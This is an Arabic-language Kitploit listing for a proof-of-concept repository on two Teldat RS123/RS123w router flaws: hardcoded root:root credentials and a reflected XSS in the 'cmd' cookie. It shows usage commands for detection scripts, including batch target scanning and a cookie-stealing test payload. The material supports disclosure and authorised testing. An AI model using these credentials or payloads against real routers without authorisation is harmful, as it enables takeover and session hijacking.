Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Teldat-Router-CVE-2022-POC — POC لـ CVE-2022-39996 (XSS المنعكسة) وCVE-2022-39997 (كلمة مرور ضعيفة) في جهاز التوجيه Teldat RS123/RS123w | Kitploit
أدوات/GitHubGitHub/uyhacked/teldat-router-cve-2022-poc
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubuyhacked/teldat-router-cve-2022-poc

Teldat-Router-CVE-2022-POC

POC لـ CVE-2022-39996 (XSS المنعكسة) وCVE-2022-39997 (كلمة مرور ضعيفة) في جهاز التوجيه Teldat RS123/RS123w

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

ثغرات راوتر Teldat CVE-2022-39996 و CVE-2022-39997 — إثبات المفهوم

إثبات المفهوم لثغرتين تم اكتشافهما في راوترات Teldat RS123 / RS123w.

نظرة عامة

معرّف CVEالنوعCWECVSSالخطورة
CVE-2022-39996XSS انعكاسيCWE-796.1متوسطة
CVE-2022-39997كلمة مرور ضعيفةCWE-5219.8حرجة

المنتج المتأثر: راوتر Teldat RS123, RS123w


CVE-2022-39997 - كلمة مرور ضعيفة

الوصف

تأتي راوترات Teldat RS123/RS123w مع بيانات اعتماد افتراضية مضمّنة في الكود root:root. غالبًا ما يترك المسؤولون هذه البيانات دون تغيير، مما يسمح للمهاجمين بدون مصادقة بالحصول على وصول إداري كامل عبر Telnet أو SSH أو HTTP أو خدمات أخرى.

الإثبات

root@kitploit:~
Account: root
Password: root

Weak Password POC

الاستخدام

root@kitploit:~
pip install requests paramiko

# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1

# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all

# Batch scan
python CVE-2022-39997.py -f targets.txt

CVE-2022-39996 - XSS انعكاسي

الوصف

يعكس مسار /upgrade/index.html قيمة ملف تعريف الارتباط cmd الخاص بـ HTTP في الاستجابة دون تعقيم. يمكن للمهاجم إنشاء طلب خبيث يحتوي على JavaScript في ملف تعريف الارتباط cmd. عندما يزور مسؤول مصادق الصفحة، يُنفَّذ السكربت في سياق متصفح واجهة الويب الخاصة بالراوتر، مما يتيح اختطاف الجلسة أو التلاعب بالإعدادات.

الإثبات

  • صياغة حمولة XSS في ملف تعريف الارتباط cmd:

XSS POC 1

  • تنفيذ XSS في المتصفح:

XSS POC 2

الاستخدام

root@kitploit:~
pip install requests

# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1

# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root

# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi

# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc

# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"

الملفات

الملفالوصف
CVE-2022-39997.pyكشف كلمة المرور الضعيفة (Telnet / SSH / HTTP / FTP)
CVE-2022-39996.pyكشف XSS الانعكاسي عبر ملف تعريف الارتباط cmd
Teldat's Router Vulnerability.mdتقرير كامل بالإفصاح عن الثغرة

إخلاء المسؤولية

سكربتات إثبات المفهوم هذه مخصّصة لأغراض التعليم والاختبار الأمني المصرح به فقط. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.

تنزيل الأداة